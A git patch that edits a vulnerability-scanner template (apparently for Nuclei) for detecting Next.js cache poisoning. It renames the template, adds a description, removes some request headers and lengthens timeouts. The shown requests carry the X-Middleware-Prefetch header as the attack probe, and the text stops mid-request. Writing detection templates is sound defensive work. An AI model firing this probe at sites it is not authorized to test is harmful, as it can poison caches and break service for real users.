From 0f98f845dd776edb8147cea719e000d07e7cab66 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 10 Jul 2024 23:41:00 +0530 Subject: [PATCH] Update nextjs-middleware-cache.yaml --- .../nextjs/nextjs-middleware-cache.yaml | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml b/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml index 78b95503f8..ee2bd67def 100644 --- a/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml +++ b/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml @@ -1,9 +1,11 @@ id: nextjs-middleware-cache info: - name: Next.js Cache Poisoning using X-Middleware-Prefetch + name: Next.js - Cache Poisoning author: DhiyaneshDk severity: high + description: | + Next.js is vulnerable to Cache Poisoning using X-Middleware-Prefetch. reference: - https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole metadata: @@ -25,22 +27,18 @@ http: - | GET /?cb={{rand}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Middleware-Prefetch: 1 Priority: u=1 - | - @timeout: 5s + @timeout: 10s GET /?cb={{rand}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Middleware-Prefetch: 1 Priority: u=1 - | - @timeout: 5s + @timeout: 10s GET /?cb={{rand}} HTTP/1.1 Host: {{Hostname}}